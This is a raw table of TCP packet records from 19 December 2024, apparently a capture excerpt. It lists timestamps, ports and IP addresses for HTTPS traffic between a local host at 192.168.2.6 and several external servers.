                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.763479948 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.772986889 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.773031950 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.773076057 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.773087978 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.773117065 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.773133039 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.783149004 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.783193111 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.783246040 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.783258915 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.783293962 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.783309937 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.793231010 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.793272018 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.793334961 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.793348074 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.793385983 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.793410063 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.916074991 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.916117907 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.916311979 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.916311979 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.916352987 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.916416883 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.924025059 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.924046040 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.924102068 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.924118042 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.924149990 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.924186945 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.932050943 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.932071924 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.932163954 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.932179928 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.932230949 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.939045906 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.939069033 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.939146996 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.939161062 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.939191103 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.939213037 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.947577000 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.947597980 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.947662115 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.947674036 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.947705984 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.947895050 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.955122948 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.955147982 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.955214977 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.955233097 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.955260038 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.955282927 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.962460995 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.962482929 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.962539911 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.962552071 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.962585926 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.962606907 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.970472097 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.970494032 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.970552921 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.970566988 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.970618963 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:20.970643044 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.119942904 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.119975090 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.120039940 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.120076895 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.120095015 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.120130062 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.127909899 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.127938032 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.127995014 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.128014088 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.128047943 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.128443003 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.135828972 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.135858059 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.135983944 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.136003017 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.136060953 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.142791986 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.142812967 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.142891884 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.142909050 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.142959118 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.151242018 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.151263952 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.151349068 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.151372910 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.151422977 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.155934095 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.156034946 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.156048059 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.156101942 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.193670988 CET49737443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.193713903 CET44349737150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.859968901 CET49749443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.860022068 CET44349749162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.860085964 CET49749443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.861975908 CET49749443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:21.861991882 CET44349749162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.615971088 CET49701443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.616075993 CET49701443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.682382107 CET49751443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.682410002 CET44349751173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.682487965 CET49751443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.684669971 CET49751443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.684688091 CET44349751173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.735660076 CET44349701173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:22.735697031 CET44349701173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:23.314543009 CET44349749162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:23.472508907 CET49749443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.018301010 CET44349751173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.018381119 CET49751443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.160562038 CET49749443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:24.160604954 CET44349749162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.072237968 CET44349749162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.072273970 CET44349749162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.072348118 CET49749443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.072448015 CET44349749162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.072544098 CET49749443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.077269077 CET49749443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.382848978 CET49759443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.382945061 CET44349759162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.383053064 CET49759443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.383363962 CET49759443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.383399963 CET44349759162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.618669987 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.618680000 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.618793964 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.628762007 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:25.628782034 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.881266117 CET44349759162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.881381035 CET49759443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.881402016 CET44349759162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.881453991 CET49759443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.920526981 CET49759443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.920541048 CET44349759162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.921523094 CET44349759162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.923371077 CET49759443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:26.971342087 CET44349759162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.156198978 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.157155991 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.157171011 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.158622980 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.158694029 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.161750078 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.161833048 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.162184954 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.162193060 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.290057898 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.718811035 CET44349759162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.719650030 CET44349759162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:27.719713926 CET49759443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.099392891 CET49759443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.315144062 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.315160036 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.315227032 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.315236092 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.315301895 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.347681046 CET49767443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.347697020 CET44349767162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.373368025 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.373431921 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.373502016 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.373784065 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.373815060 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.648127079 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.648164988 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.648238897 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.648709059 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.648720980 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.985496044 CET49780443192.168.2.62.16.158.73
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.985538960 CET443497802.16.158.73192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.985939980 CET49780443192.168.2.62.16.158.73
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.986171007 CET49780443192.168.2.62.16.158.73
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:28.986183882 CET443497802.16.158.73192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.677000046 CET49783443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.677051067 CET44349783162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.677154064 CET49783443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.686039925 CET49783443192.168.2.6162.125.69.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.686059952 CET44349783162.125.69.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.854712009 CET49751443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.961118937 CET49787443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.961164951 CET44349787162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.961288929 CET49787443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.961622953 CET49787443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.961641073 CET44349787162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.961987019 CET49788443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.962008953 CET44349788172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.962106943 CET49788443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.962291956 CET49788443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.962321043 CET44349788172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.970976114 CET49790443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.971012115 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.971084118 CET49790443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.971611023 CET49790443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:29.971640110 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.064388990 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.096095085 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.096122026 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.097320080 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.097393036 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.097404003 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.097464085 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.099541903 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.099627018 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.100261927 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.100270987 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.181091070 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.263040066 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.263344049 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.263365030 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.263742924 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.263756037 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.263793945 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.263801098 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.263854027 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.264467955 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.265822887 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.265886068 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.266019106 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.311341047 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.471369028 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.471438885 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.579395056 CET443497802.16.158.73192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.605925083 CET49780443192.168.2.62.16.158.73
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.605958939 CET443497802.16.158.73192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.607639074 CET443497802.16.158.73192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.607781887 CET49780443192.168.2.62.16.158.73
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.613380909 CET49780443192.168.2.62.16.158.73
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.613507986 CET443497802.16.158.73192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.650053024 CET49795443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.650095940 CET44349795162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.650175095 CET49795443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.650410891 CET49795443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.650429010 CET44349795162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.777515888 CET49796443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.777581930 CET44349796172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.777659893 CET49796443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.778538942 CET49797443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.778573990 CET44349797172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.778636932 CET49797443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.778948069 CET49796443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.778980970 CET44349796172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.779237986 CET49797443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.779254913 CET44349797172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.780114889 CET49780443192.168.2.62.16.158.73
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.780128002 CET443497802.16.158.73192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.878470898 CET49787443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.878626108 CET49795443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.879225969 CET49799443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.879283905 CET44349799162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.879379034 CET49799443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.879599094 CET49800443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.879631042 CET44349800162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.879717112 CET49800443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.880372047 CET49788443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.880479097 CET49797443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:30.881022930 CET49780443192.168.2.62.16.158.73
